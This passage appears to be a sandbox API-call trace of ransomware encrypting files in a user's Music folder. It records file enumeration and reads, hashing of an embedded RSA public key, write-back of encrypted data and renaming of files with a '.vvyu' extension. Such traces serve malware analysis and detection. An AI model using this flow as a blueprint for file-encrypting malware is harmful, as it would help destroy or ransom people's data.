lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3110 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30f8 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3128 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0198.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3110 | out: hHeap=0x620000) returned 1 [0198.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93198 | out: hHeap=0x620000) returned 1 [0198.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddb40 | out: hHeap=0x620000) returned 1 [0198.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0198.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.942] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x16deb, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x16deb, lpOverlapped=0x0) returned 1 [0198.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0198.943] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x16df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.943] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0198.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0198.944] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.945] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.945] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.945] CloseHandle (hObject=0x510) returned 1 [0198.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0198.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0198.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0198.947] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\cmBSppsTLRb9u.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\cmbsppstlrb9u.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\cmBSppsTLRb9u.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\cmbsppstlrb9u.m4a.vvyu")) returned 1 [0198.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0198.952] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0198.954] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ccce850, ftCreationTime.dwHighDateTime=0x1d89af2, ftLastAccessTime.dwLowDateTime=0xd1b72e60, ftLastAccessTime.dwHighDateTime=0x1d8a20c, ftLastWriteTime.dwLowDateTime=0xd1b72e60, ftLastWriteTime.dwHighDateTime=0x1d8a20c, nFileSizeHigh=0x0, nFileSizeLow=0x116e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dTVoZ bX824b.wav", cAlternateFileName="DTVOZB~1.WAV")) returned 1 [0198.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0198.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0198.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0198.954] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\dTVoZ bX824b.wav") returned=".wav" [0198.955] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\dTVoZ bX824b.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\dtvoz bx824b.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0198.955] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=71394) returned 1 [0198.955] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.959] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x116bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.959] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0198.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0198.963] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.963] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x116e2, lpOverlapped=0x0) returned 1 [0198.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0198.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.965] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.966] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.966] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.966] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.966] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.966] GetLastError () returned 0x0 [0198.966] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0198.966] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0198.967] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.967] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.967] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0198.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0198.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x116e0) returned 0x2ea79b0 [0198.967] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb40 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93198 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb88 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3110 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0198.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.969] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0198.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0198.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3128 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea30b0 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0198.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0198.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0198.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.971] GetCurrentThreadId () returned 0x66c [0198.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6100 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.972] RtlAllocateHeap 